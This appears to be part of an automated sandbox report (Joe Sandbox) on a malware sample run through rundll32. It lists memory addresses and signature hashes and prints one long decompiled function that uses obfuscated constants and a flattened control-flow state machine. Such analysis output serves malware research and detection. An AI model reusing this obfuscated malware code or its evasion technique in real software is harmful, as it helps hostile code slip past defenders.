                                                                                                                      0x00693c3d
                                                                                                                      0x00693ce0
                                                                                                                      0x00693cef
                                                                                                                      0x00693cf4
                                                                                                                      0x00693cfb
                                                                                                                      0x00693d03
                                                                                                                      0x00000000
                                                                                                                      0x00693d03
                                                                                                                      0x00693c43
                                                                                                                      0x00693c49
                                                                                                                      0x00693c9e
                                                                                                                      0x00693caa
                                                                                                                      0x00693cbe
                                                                                                                      0x00693cc4
                                                                                                                      0x00000000
                                                                                                                      0x00693cc4
                                                                                                                      0x00693c4b
                                                                                                                      0x00693c51
                                                                                                                      0x00693c81
                                                                                                                      0x00693c86
                                                                                                                      0x00000000
                                                                                                                      0x00693c86
                                                                                                                      0x00693c53
                                                                                                                      0x00693c59
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00693c63
                                                                                                                      0x00693c68
                                                                                                                      0x00693c6a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00693c70
                                                                                                                      0x00000000
                                                                                                                      0x00693fad
                                                                                                                      0x00693fad
                                                                                                                      0x00693fad
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )If$D}$D}$G$TRr$Y2($\Q$c{v$n)+$rZM*${)t${)t$`$u#$xy
                                                                                                                      • API String ID: 0-3738653114
                                                                                                                      • Opcode ID: c69a520c86b00743ba0ac5bf14b34c97b70546c22a57a5e83be229c867c8b4e4
                                                                                                                      • Instruction ID: 156daf2e10a5a8ad2841a3e61af398f53d53dcc0c10e77747f303e20ac56a2ee
                                                                                                                      • Opcode Fuzzy Hash: c69a520c86b00743ba0ac5bf14b34c97b70546c22a57a5e83be229c867c8b4e4
                                                                                                                      • Instruction Fuzzy Hash: 27C224715083808BD7B8DF25C58ABCFBBE1BB85314F10891DE5DA9A660DBB08949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00682BD9 Relevance: 19.4, Strings: 15, Instructions: 636COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00682BD9(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char* _v60;
				intOrPtr _v64;
				signed int _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				void* _t716;
				void* _t717;
				void* _t718;
				intOrPtr _t730;
				intOrPtr _t732;
				void* _t733;
				signed int _t735;
				void* _t741;
				intOrPtr _t746;
				intOrPtr _t752;
				intOrPtr _t754;
				intOrPtr _t755;
				void* _t757;
				void* _t759;
				intOrPtr _t760;
				void* _t766;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				void* _t783;
				intOrPtr _t792;
				void* _t807;
				void* _t812;
				void* _t842;
				intOrPtr _t848;
				void* _t864;
				intOrPtr _t866;
				signed int _t867;
				void* _t868;
				void* _t873;
				signed int* _t875;
				void* _t878;

				_t875 =  &_v396;
				_v56 = 0xa0cd19;
				_t873 = 0;
				_v84 = __ecx;
				_v52 = _v52 & 0;
				_t766 = 0x41de8e2;
				_v48 = _v48 & 0;
				_v300 = 0x1109eb;
				_v300 = _v300 + 0xcb;
				_v300 = _v300 | 0xecff95c2;
				_v300 = _v300 ^ 0xa1bddbbd;
				_v252 = 0xe28eec;
				_v252 = _v252 + 0x19d6;
				_v252 = _v252 | 0xcaf404bd;
				_v252 = _v252 ^ 0xcaf6acfe;
				_v124 = 0x517500;
				_v124 = _v124 + 0x84ec;
				_v124 = _v124 ^ 0x0051f9ec;
				_v344 = 0xbde49;
				_t772 = 0x31;
				_v344 = _v344 * 0x35;
				_v344 = _v344 << 9;
				_v344 = _v344 + 0x7afe;
				_v344 = _v344 ^ 0xea0ab4fe;
				_v232 = 0xd06c4e;
				_v232 = _v232 | 0x98bd8447;
				_v232 = _v232 + 0xffff492f;
				_v232 = _v232 ^ 0x98fd357e;
				_v236 = 0xf2a19d;
				_v236 = _v236 << 8;
				_v236 = _v236 | 0xeb063d66;
				_v236 = _v236 ^ 0xfba7bd66;
				_v304 = 0x7cba75;
				_v304 = _v304 << 0x10;
				_v304 = _v304 >> 0xd;
				_v304 = _v304 ^ 0x0005d3a8;
				_v220 = 0xced2db;
				_v220 = _v220 >> 0xb;
				_v220 = _v220 * 0x6a;
				_v220 = _v220 ^ 0x000ab444;
				_v356 = 0x98a5e4;
				_v356 = _v356 ^ 0xdd9204f6;
				_v356 = _v356 | 0x4689a95f;
				_v356 = _v356 * 0x48;
				_v356 = _v356 ^ 0xdf47a2b8;
				_v292 = 0x99ac6b;
				_v292 = _v292 * 0x35;
				_v292 = _v292 / _t772;
				_v292 = _v292 ^ 0x00a637e1;
				_v348 = 0x8d86f8;
				_v348 = _v348 + 0x9ec9;
				_v348 = _v348 + 0xfffff441;
				_v348 = _v348 * 0x3a;
				_v348 = _v348 ^ 0x2031e474;
				_v208 = 0x39dd97;
				_v208 = _v208 << 0x10;
				_v208 = _v208 + 0x9a19;
				_v208 = _v208 ^ 0xdd979a19;
				_v100 = 0xd2197;
				_v100 = _v100 + 0x97e4;
				_v100 = _v100 ^ 0x000db95b;
				_v324 = 0x771ce;
				_v324 = _v324 << 1;
				_v324 = _v324 ^ 0x580a954c;
				_v324 = _v324 ^ 0x580cba62;
				_v352 = 0xd79a55;
				_t867 = 0x4d;
				_v352 = _v352 / _t867;
				_v352 = _v352 << 5;
				_v352 = _v352 + 0xffffa0ed;
				_v352 = _v352 ^ 0x005b1fb1;
				_v264 = 0xbc6795;
				_v264 = _v264 + 0x99f5;
				_v264 = _v264 | 0xde86e00c;
				_v264 = _v264 ^ 0xdeb9ffad;
				_v240 = 0x2649df;
				_v240 = _v240 + 0x8f57;
				_v240 = _v240 + 0xffffdcf3;
				_v240 = _v240 ^ 0x002859eb;
				_v180 = 0x284ff;
				_v180 = _v180 + 0xfffffbe4;
				_v180 = _v180 ^ 0x0004b053;
				_v248 = 0x43d81c;
				_t773 = 0x2c;
				_v248 = _v248 * 0x30;
				_v248 = _v248 + 0x77f1;
				_v248 = _v248 ^ 0x0cb65cea;
				_v164 = 0x561af9;
				_v164 = _v164 * 0x5f;
				_v164 = _v164 ^ 0x1ff767f2;
				_v172 = 0x424117;
				_v172 = _v172 / _t773;
				_v172 = _v172 ^ 0x000edcdb;
				_v336 = 0xedf003;
				_v336 = _v336 + 0xffff11da;
				_v336 = _v336 >> 2;
				_v336 = _v336 >> 9;
				_v336 = _v336 ^ 0x000c05d4;
				_v216 = 0xec53cc;
				_v216 = _v216 | 0x30e2710b;
				_v216 = _v216 * 0x1f;
				_v216 = _v216 ^ 0xeced0588;
				_v224 = 0xc36dcc;
				_v224 = _v224 * 0x64;
				_v224 = _v224 * 0xc;
				_v224 = _v224 ^ 0x9413d5fd;
				_v148 = 0x5fde01;
				_v148 = _v148 ^ 0x51967584;
				_v148 = _v148 ^ 0x51c7dbee;
				_v156 = 0x26546c;
				_v156 = _v156 ^ 0x8ec08bcd;
				_v156 = _v156 ^ 0x8eeee361;
				_v396 = 0x210674;
				_v396 = _v396 ^ 0xb585172f;
				_v396 = _v396 >> 9;
				_v396 = _v396 ^ 0x5fa8c9ed;
				_v396 = _v396 ^ 0x5ff25ba7;
				_v112 = 0xa4fdb5;
				_v112 = _v112 ^ 0x7ac22777;
				_v112 = _v112 ^ 0x7a606cfd;
				_v160 = 0x7fe066;
				_v160 = _v160 | 0xe6d7910f;
				_v160 = _v160 ^ 0xe6fe40a3;
				_v152 = 0xb045a1;
				_v152 = _v152 ^ 0x0733bf74;
				_v152 = _v152 ^ 0x078d93a6;
				_v384 = 0x7bd524;
				_v384 = _v384 + 0xffff236c;
				_v384 = _v384 * 0x7b;
				_v384 = _v384 + 0xffffb98b;
				_v384 = _v384 ^ 0x3b1735e1;
				_v392 = 0x61d9a1;
				_v392 = _v392 + 0xab93;
				_v392 = _v392 + 0xffff054c;
				_v392 = _v392 | 0xc62dc39c;
				_v392 = _v392 ^ 0xc661791a;
				_v376 = 0x1528d1;
				_v376 = _v376 << 8;
				_v376 = _v376 + 0xffff31a1;
				_v376 = _v376 >> 9;
				_v376 = _v376 ^ 0x000f3b72;
				_v268 = 0x199e3d;
				_v268 = _v268 ^ 0x3c18ecc0;
				_v268 = _v268 >> 0xf;
				_v268 = _v268 ^ 0x00085298;
				_v116 = 0x9d324d;
				_t774 = 0x5b;
				_v116 = _v116 * 0x35;
				_v116 = _v116 ^ 0x2088a224;
				_v144 = 0xea008e;
				_v144 = _v144 * 0x31;
				_v144 = _v144 ^ 0x2cc3d943;
				_v200 = 0xbe23d7;
				_v200 = _v200 / _t774;
				_v200 = _v200 ^ 0x0006a720;
				_v368 = 0xbc3a01;
				_v368 = _v368 >> 2;
				_v368 = _v368 << 1;
				_v368 = _v368 | 0x91e27348;
				_v368 = _v368 ^ 0x91f48308;
				_v312 = 0x81ba05;
				_v312 = _v312 ^ 0x6d6d273d;
				_v312 = _v312 + 0x9af1;
				_v312 = _v312 ^ 0x6ded9aad;
				_v320 = 0xa9a2ca;
				_v320 = _v320 / _t867;
				_t775 = 0x39;
				_v320 = _v320 / _t775;
				_v320 = _v320 ^ 0x0005ef3e;
				_v136 = 0x8e55db;
				_t776 = 0xb;
				_v136 = _v136 / _t776;
				_v136 = _v136 ^ 0x00010f6d;
				_v296 = 0x9a02a3;
				_v296 = _v296 | 0xc0bbeea6;
				_v296 = _v296 ^ 0xfebfff47;
				_v296 = _v296 ^ 0x3e0de8e7;
				_v196 = 0x628794;
				_v196 = _v196 >> 7;
				_v196 = _v196 ^ 0x00033c53;
				_v360 = 0xc75687;
				_t777 = 0x55;
				_v360 = _v360 / _t777;
				_t778 = 0x4a;
				_v360 = _v360 / _t778;
				_t779 = 0x66;
				_v360 = _v360 / _t779;
				_v360 = _v360 ^ 0x0006bc1c;
				_v288 = 0xb89ddb;
				_t780 = 0x5c;
				_v288 = _v288 * 0x7b;
				_v288 = _v288 + 0x220a;
				_v288 = _v288 ^ 0x58b2320e;
				_v108 = 0x352a49;
				_v108 = _v108 | 0x42677ea4;
				_v108 = _v108 ^ 0x427d3f06;
				_v332 = 0x1123f9;
				_v332 = _v332 + 0xfffffbdd;
				_v332 = _v332 + 0xffff8b7f;
				_v332 = _v332 | 0xcf6269e1;
				_v332 = _v332 ^ 0xcf7a63e7;
				_v192 = 0x15ba5c;
				_v192 = _v192 + 0xffff7d63;
				_v192 = _v192 ^ 0x0011de47;
				_v204 = 0xd88287;
				_v204 = _v204 >> 1;
				_v204 = _v204 ^ 0x006fcfd9;
				_v308 = 0x394063;
				_v308 = _v308 | 0x23438f89;
				_v308 = _v308 ^ 0x95557e79;
				_v308 = _v308 ^ 0xb625da34;
				_v260 = 0x6632ca;
				_v260 = _v260 << 0xc;
				_v260 = _v260 / _t780;
				_v260 = _v260 ^ 0x011a1b64;
				_v316 = 0x1ead1d;
				_v316 = _v316 >> 0xf;
				_v316 = _v316 << 0xe;
				_v316 = _v316 ^ 0x000acc6a;
				_v388 = 0xc01c7d;
				_v388 = _v388 >> 9;
				_v388 = _v388 | 0xa159bc3f;
				_v388 = _v388 ^ 0x1058b9c4;
				_v388 = _v388 ^ 0xb10bd724;
				_v256 = 0x2459a9;
				_v256 = _v256 + 0xffff58c0;
				_v256 = _v256 >> 0xc;
				_v256 = _v256 ^ 0x000386a3;
				_v340 = 0xa38d0b;
				_t781 = 0x78;
				_v340 = _v340 / _t781;
				_v340 = _v340 ^ 0x3e3bd45c;
				_v340 = _v340 + 0xf3c0;
				_v340 = _v340 ^ 0x3e3a819a;
				_v380 = 0x2dd945;
				_v380 = _v380 << 4;
				_v380 = _v380 + 0xffffb7c2;
				_v380 = _v380 << 6;
				_v380 = _v380 ^ 0xb75574a7;
				_v272 = 0xf6939e;
				_v272 = _v272 | 0x851c2f86;
				_v272 = _v272 + 0xffff0412;
				_v272 = _v272 ^ 0x85fd1a3b;
				_v188 = 0x2c17e;
				_v188 = _v188 >> 3;
				_v188 = _v188 ^ 0x000c5ae0;
				_v280 = 0xf08b81;
				_v280 = _v280 | 0x75266007;
				_v280 = _v280 ^ 0xc75f894a;
				_v280 = _v280 ^ 0xb2a4e63e;
				_v372 = 0x6f48a0;
				_v372 = _v372 << 0xa;
				_v372 = _v372 >> 0x10;
				_v372 = _v372 | 0x5e122b7b;
				_v372 = _v372 ^ 0x5e16ce05;
				_v184 = 0x747075;
				_v184 = _v184 + 0xcea0;
				_v184 = _v184 ^ 0x007a5d3b;
				_v128 = 0x4ebeca;
				_v128 = _v128 + 0xffffee54;
				_v128 = _v128 ^ 0x004a846f;
				_v120 = 0xe78fe5;
				_t868 = 0x80c65ec;
				_v120 = _v120 + 0xffff4f7b;
				_t864 = 0xf9e92c1;
				_v120 = _v120 ^ 0x00e2ece2;
				_v276 = 0xe2917e;
				_v276 = _v276 << 6;
				_v276 = _v276 + 0xffff0dfb;
				_v276 = _v276 ^ 0x38a72339;
				_v176 = 0x1ec236;
				_v176 = _v176 ^ 0x7af5486d;
				_v176 = _v176 ^ 0x7aeb8f45;
				_v244 = 0x4d92e1;
				_t782 = 0x5f;
				_v88 = 0x20;
				_v244 = _v244 * 0x4a;
				_v244 = _v244 | 0x7c3f7c28;
				_v244 = _v244 ^ 0x7e7c1ac2;
				_v284 = 0xc8aa60;
				_v284 = _v284 + 0x32b9;
				_v284 = _v284 + 0xffff127a;
				_v284 = _v284 ^ 0x00c1b775;
				_v228 = 0x32f957;
				_v228 = _v228 << 0xa;
				_v228 = _v228 ^ 0xe304a089;
				_v228 = _v228 ^ 0x28edcf32;
				_v364 = 0x1a55e7;
				_v364 = _v364 * 0x68;
				_v364 = _v364 * 0x36;
				_v364 = _v364 ^ 0xa842ca33;
				_v364 = _v364 ^ 0xe9f59c27;
				_v168 = 0x34b570;
				_v168 = _v168 | 0x6b6928c5;
				_v168 = _v168 ^ 0x6b739674;
				_v104 = 0x8a8082;
				_v104 = _v104 * 0x3f;
				_v104 = _v104 ^ 0x2214377a;
				_v212 = 0x18307b;
				_v212 = _v212 ^ 0x4b6e1055;
				_v212 = _v212 ^ 0x41119872;
				_v212 = _v212 ^ 0x0a6c434c;
				_v132 = 0x8b3f3c;
				_v132 = _v132 << 2;
				_v132 = _v132 ^ 0x022c35f2;
				_v328 = 0x314aa5;
				_v328 = _v328 | 0xbabb419f;
				_v328 = _v328 / _t782;
				_v328 = _v328 + 0xe73f;
				_v328 = _v328 ^ 0x01f1132e;
				_v140 = 0x403514;
				_v140 = _v140 + 0xffff4e06;
				_v140 = _v140 ^ 0x0039264a;
				while(1) {
					L1:
					_t783 = 0xf0ee26a;
					_t842 = 0xbf4f028;
					_t716 = 0xc1f5c56;
					do {
						while(1) {
							L2:
							_t878 = _t766 - _t716;
							if(_t878 > 0) {
								break;
							}
							if(_t878 == 0) {
								_push(_v160);
								_push(_v112);
								_t732 = E0069DCF7(_v396, 0x681884, __eflags);
								_push(_v392);
								_t866 = _t732;
								_push(_v384);
								_t733 = E0069DCF7(_v152, 0x681924, __eflags);
								_v76 = _v124;
								_t735 = E0068CB52(_v376, _t866, _v268, _v116, _v144);
								_v68 = _v68 & 0x00000000;
								_v72 = _t866;
								_v80 = 2 + _t735 * 2;
								_v60 =  &_v80;
								_v92 = _v88;
								_v64 = 1;
								_t741 = E00688D13( &_v32, _v200, _v368,  &_v92, _v84, _t733, _v312,  &_v68, _v88, _v320, _v136, _v236);
								_t875 =  &(_t875[0x11]);
								__eflags = _t741 - _v304;
								_t766 =  ==  ? 0xbf4f028 : 0xf9e92c1;
								E0068A8B0(_v296, _t866, _v196);
								E0068A8B0(_v360, _t733, _v288);
								_t864 = 0xf9e92c1;
								goto L24;
							} else {
								if(_t766 == 0xdec32e) {
									_t746 =  *0x6a3dfc; // 0x0
									E00698519(_v104, _v212,  *((intOrPtr*)(_t746 + 0x50)));
									_t766 = _t864;
									while(1) {
										L1:
										_t783 = 0xf0ee26a;
										_t842 = 0xbf4f028;
										_t716 = 0xc1f5c56;
										goto L2;
									}
								} else {
									if(_t766 == 0x41de8e2) {
										_t766 = 0xe078043;
										continue;
									} else {
										if(_t766 == _t868) {
											_push(_v128);
											_push(_v184);
											_t871 = E0069DCF7(_v372, 0x681904, __eflags);
											_t585 =  &_v300; // 0x3e0de8e7
											_v44 =  *_t585;
											_v40 = _v252;
											_pop(_t807);
											_v36 = _v100;
											_t752 =  *0x6a3dfc; // 0x0
											_t754 =  *0x6a3dfc; // 0x0
											_t755 =  *0x6a3dfc; // 0x0
											_t757 = E0069D84C(_t807, _v120, _t755 + 0x64, _v276,  *((intOrPtr*)(_t754 + 0x54)), _v96, _v176, _v244, _v284, _v228, _v292, _t807, _t748,  &_v44,  *((intOrPtr*)(_t752 + 0x50)));
											_t875 =  &(_t875[0xd]);
											__eflags = _t757 - _v348;
											if(_t757 != _v348) {
												_t766 = 0xdec32e;
											} else {
												_t766 = _t864;
												_t873 = 1;
											}
											E0068A8B0(_v364, _t871, _v168);
											goto L24;
										} else {
											_t882 = _t766 - _t842;
											if(_t766 == _t842) {
												_push(_v192);
												_push(_v332);
												_t759 = E0069DCF7(_v108, 0x6818b4, _t882);
												_pop(_t812);
												_t760 =  *0x6a3dfc; // 0x0
												E006A0B68(_t759,  &_v92, _v220, _v204, _t812, _t760 + 0x54, _v308, _v260, _v316, _v388, _v96, _v256);
												_t766 =  ==  ? 0xf0ee26a : _t864;
												E0068A8B0(_v340, _t759, _v380);
												L23:
												_t875 =  &(_t875[0xb]);
												L24:
												_t842 = 0xbf4f028;
												_t783 = 0xf0ee26a;
												_t868 = 0x80c65ec;
												_t716 = 0xc1f5c56;
											}
										}
										goto L25;
									}
								}
							}
							L20:
							return _t873;
						}
						__eflags = _t766 - 0xe078043;
						if(__eflags == 0) {
							_push(_v264);
							_push(_v352);
							_t717 = E0069DCF7(_v324, 0x6818e4, __eflags);
							_push(_v248);
							_push(_v180);
							_t718 = E0069DCF7(_v240, 0x681814, __eflags);
							_t665 =  &_v172; // 0x39264a
							__eflags = E00689462(_t717,  *_t665,  &_v96, _t718, _v336, _v344) - _v232;
							_t766 =  ==  ? 0xc1f5c56 : 0x1d0239b;
							E0068A8B0(_v216, _t717, _v224);
							E0068A8B0(_v148, _t718, _v156);
							_t864 = 0xf9e92c1;
							goto L23;
						} else {
							__eflags = _t766 - _t783;
							if(_t766 == _t783) {
								_t848 =  *0x6a3dfc; // 0x0
								_push(_t783);
								_push(_t783);
								_t792 = E00687FF2( *((intOrPtr*)(_t848 + 0x54)));
								_t730 =  *0x6a3dfc; // 0x0
								__eflags = _t792;
								_t766 =  !=  ? _t868 : _t864;
								 *((intOrPtr*)(_t730 + 0x50)) = _t792;
								goto L1;
							} else {
								__eflags = _t766 - _t864;
								if(__eflags != 0) {
									goto L25;
								} else {
									_t646 =  &_v140; // 0x39264a
									E0068957D(_v96, _v132, _v328, _v208,  *_t646);
								}
							}
						}
						goto L20;
						L25:
					} while (_t766 != 0x1d0239b);
					goto L20;
				}
			}







































































































































                                                                                                                      0x00682bd9
                                                                                                                      0x00682bdf
                                                                                                                      0x00682bee
                                                                                                                      0x00682bf0
                                                                                                                      0x00682bf7
                                                                                                                      0x00682bfe
                                                                                                                      0x00682c03
                                                                                                                      0x00682c0a
                                                                                                                      0x00682c12
                                                                                                                      0x00682c1a
                                                                                                                      0x00682c22
                                                                                                                      0x00682c2a
                                                                                                                      0x00682c35
                                                                                                                      0x00682c40
                                                                                                                      0x00682c4b
                                                                                                                      0x00682c56
                                                                                                                      0x00682c61
                                                                                                                      0x00682c6c
                                                                                                                      0x00682c77
                                                                                                                      0x00682c88
                                                                                                                      0x00682c89
                                                                                                                      0x00682c8d
                                                                                                                      0x00682c92
                                                                                                                      0x00682c9a
                                                                                                                      0x00682ca2
                                                                                                                      0x00682cad
                                                                                                                      0x00682cb8
                                                                                                                      0x00682cc3
                                                                                                                      0x00682cce
                                                                                                                      0x00682cd9
                                                                                                                      0x00682ce1
                                                                                                                      0x00682cec
                                                                                                                      0x00682cf7
                                                                                                                      0x00682cff
                                                                                                                      0x00682d04
                                                                                                                      0x00682d09
                                                                                                                      0x00682d11
                                                                                                                      0x00682d1c
                                                                                                                      0x00682d2e
                                                                                                                      0x00682d35
                                                                                                                      0x00682d40
                                                                                                                      0x00682d48
                                                                                                                      0x00682d50
                                                                                                                      0x00682d5d
                                                                                                                      0x00682d61
                                                                                                                      0x00682d69
                                                                                                                      0x00682d76
                                                                                                                      0x00682d80
                                                                                                                      0x00682d84
                                                                                                                      0x00682d8c
                                                                                                                      0x00682d94
                                                                                                                      0x00682d9c
                                                                                                                      0x00682da9
                                                                                                                      0x00682dad
                                                                                                                      0x00682db5
                                                                                                                      0x00682dc0
                                                                                                                      0x00682dc8
                                                                                                                      0x00682dd3
                                                                                                                      0x00682dde
                                                                                                                      0x00682de9
                                                                                                                      0x00682df4
                                                                                                                      0x00682dff
                                                                                                                      0x00682e07
                                                                                                                      0x00682e0b
                                                                                                                      0x00682e13
                                                                                                                      0x00682e1d
                                                                                                                      0x00682e29
                                                                                                                      0x00682e2e
                                                                                                                      0x00682e34
                                                                                                                      0x00682e39
                                                                                                                      0x00682e41
                                                                                                                      0x00682e49
                                                                                                                      0x00682e54
                                                                                                                      0x00682e5f
                                                                                                                      0x00682e6a
                                                                                                                      0x00682e75
                                                                                                                      0x00682e80
                                                                                                                      0x00682e8b
                                                                                                                      0x00682e96
                                                                                                                      0x00682ea1
                                                                                                                      0x00682eac
                                                                                                                      0x00682eb7
                                                                                                                      0x00682ec2
                                                                                                                      0x00682ed5
                                                                                                                      0x00682ed6
                                                                                                                      0x00682edd
                                                                                                                      0x00682ee8
                                                                                                                      0x00682ef3
                                                                                                                      0x00682f06
                                                                                                                      0x00682f0d
                                                                                                                      0x00682f18
                                                                                                                      0x00682f2c
                                                                                                                      0x00682f33
                                                                                                                      0x00682f3e
                                                                                                                      0x00682f46
                                                                                                                      0x00682f4e
                                                                                                                      0x00682f53
                                                                                                                      0x00682f58
                                                                                                                      0x00682f60
                                                                                                                      0x00682f6b
                                                                                                                      0x00682f7e
                                                                                                                      0x00682f85
                                                                                                                      0x00682f90
                                                                                                                      0x00682fa3
                                                                                                                      0x00682fb2
                                                                                                                      0x00682fb9
                                                                                                                      0x00682fc4
                                                                                                                      0x00682fcf
                                                                                                                      0x00682fda
                                                                                                                      0x00682fe5
                                                                                                                      0x00682ff0
                                                                                                                      0x00682ffb
                                                                                                                      0x00683006
                                                                                                                      0x0068300e
                                                                                                                      0x00683016
                                                                                                                      0x0068301b
                                                                                                                      0x00683023
                                                                                                                      0x0068302b
                                                                                                                      0x00683036
                                                                                                                      0x00683041
                                                                                                                      0x0068304c
                                                                                                                      0x00683057
                                                                                                                      0x00683062
                                                                                                                      0x0068306d
                                                                                                                      0x00683078
                                                                                                                      0x00683083
                                                                                                                      0x0068308e
                                                                                                                      0x00683096
                                                                                                                      0x006830a3
                                                                                                                      0x006830a7
                                                                                                                      0x006830af
                                                                                                                      0x006830b7
                                                                                                                      0x006830bf
                                                                                                                      0x006830c7
                                                                                                                      0x006830cf
                                                                                                                      0x006830d7
                                                                                                                      0x006830df
                                                                                                                      0x006830e9
                                                                                                                      0x006830ee
                                                                                                                      0x006830f6
                                                                                                                      0x006830fb
                                                                                                                      0x00683103
                                                                                                                      0x0068310e
                                                                                                                      0x00683119
                                                                                                                      0x00683121
                                                                                                                      0x0068312c
                                                                                                                      0x00683141
                                                                                                                      0x00683144
                                                                                                                      0x0068314b
                                                                                                                      0x00683156
                                                                                                                      0x00683169
                                                                                                                      0x00683170
                                                                                                                      0x0068317b
                                                                                                                      0x00683191
                                                                                                                      0x00683198
                                                                                                                      0x006831a3
                                                                                                                      0x006831ab
                                                                                                                      0x006831b0
                                                                                                                      0x006831b4
                                                                                                                      0x006831bc
                                                                                                                      0x006831c4
                                                                                                                      0x006831cc
                                                                                                                      0x006831d4
                                                                                                                      0x006831dc
                                                                                                                      0x006831e4
                                                                                                                      0x006831f4
                                                                                                                      0x006831fc
                                                                                                                      0x00683201
                                                                                                                      0x00683207
                                                                                                                      0x0068320f
                                                                                                                      0x00683221
                                                                                                                      0x00683226
                                                                                                                      0x0068322f
                                                                                                                      0x0068323a
                                                                                                                      0x00683242
                                                                                                                      0x0068324a
                                                                                                                      0x00683252
                                                                                                                      0x0068325a
                                                                                                                      0x00683265
                                                                                                                      0x0068326d
                                                                                                                      0x00683278
                                                                                                                      0x00683284
                                                                                                                      0x00683289
                                                                                                                      0x00683293
                                                                                                                      0x00683298
                                                                                                                      0x006832a2
                                                                                                                      0x006832a5
                                                                                                                      0x006832a9
                                                                                                                      0x006832b1
                                                                                                                      0x006832c2
                                                                                                                      0x006832c5
                                                                                                                      0x006832cc
                                                                                                                      0x006832d7
                                                                                                                      0x006832e2
                                                                                                                      0x006832ed
                                                                                                                      0x006832f8
                                                                                                                      0x00683303
                                                                                                                      0x0068330b
                                                                                                                      0x00683313
                                                                                                                      0x0068331b
                                                                                                                      0x00683323
                                                                                                                      0x0068332b
                                                                                                                      0x00683336
                                                                                                                      0x00683341
                                                                                                                      0x0068334c
                                                                                                                      0x00683357
                                                                                                                      0x0068335e
                                                                                                                      0x00683369
                                                                                                                      0x00683371
                                                                                                                      0x00683379
                                                                                                                      0x00683381
                                                                                                                      0x00683389
                                                                                                                      0x00683394
                                                                                                                      0x006833a7
                                                                                                                      0x006833ae
                                                                                                                      0x006833b9
                                                                                                                      0x006833c1
                                                                                                                      0x006833c6
                                                                                                                      0x006833cb
                                                                                                                      0x006833d3
                                                                                                                      0x006833db
                                                                                                                      0x006833e0
                                                                                                                      0x006833e8
                                                                                                                      0x006833f0
                                                                                                                      0x006833f8
                                                                                                                      0x00683403
                                                                                                                      0x0068340e
                                                                                                                      0x00683416
                                                                                                                      0x00683421
                                                                                                                      0x0068342d
                                                                                                                      0x00683430
                                                                                                                      0x00683434
                                                                                                                      0x0068343c
                                                                                                                      0x00683444
                                                                                                                      0x0068344c
                                                                                                                      0x00683454
                                                                                                                      0x00683459
                                                                                                                      0x00683461
                                                                                                                      0x00683466
                                                                                                                      0x0068346e
                                                                                                                      0x00683479
                                                                                                                      0x00683484
                                                                                                                      0x0068348f
                                                                                                                      0x0068349a
                                                                                                                      0x006834a5
                                                                                                                      0x006834ad
                                                                                                                      0x006834b8
                                                                                                                      0x006834c3
                                                                                                                      0x006834ce
                                                                                                                      0x006834d9
                                                                                                                      0x006834e4
                                                                                                                      0x006834ec
                                                                                                                      0x006834f1
                                                                                                                      0x006834f6
                                                                                                                      0x006834fe
                                                                                                                      0x00683506
                                                                                                                      0x00683511
                                                                                                                      0x0068351c
                                                                                                                      0x00683527
                                                                                                                      0x00683532
                                                                                                                      0x0068353d
                                                                                                                      0x0068354a
                                                                                                                      0x00683555
                                                                                                                      0x0068355a
                                                                                                                      0x00683565
                                                                                                                      0x0068356a
                                                                                                                      0x00683575
                                                                                                                      0x00683580
                                                                                                                      0x00683588
                                                                                                                      0x00683593
                                                                                                                      0x0068359e
                                                                                                                      0x006835a9
                                                                                                                      0x006835b4
                                                                                                                      0x006835bf
                                                                                                                      0x006835d4
                                                                                                                      0x006835d5
                                                                                                                      0x006835e0
                                                                                                                      0x006835e7
                                                                                                                      0x006835f2
                                                                                                                      0x006835fd
                                                                                                                      0x00683608
                                                                                                                      0x00683613
                                                                                                                      0x0068361e
                                                                                                                      0x00683629
                                                                                                                      0x00683634
                                                                                                                      0x0068363c
                                                                                                                      0x00683647
                                                                                                                      0x00683652
                                                                                                                      0x0068365f
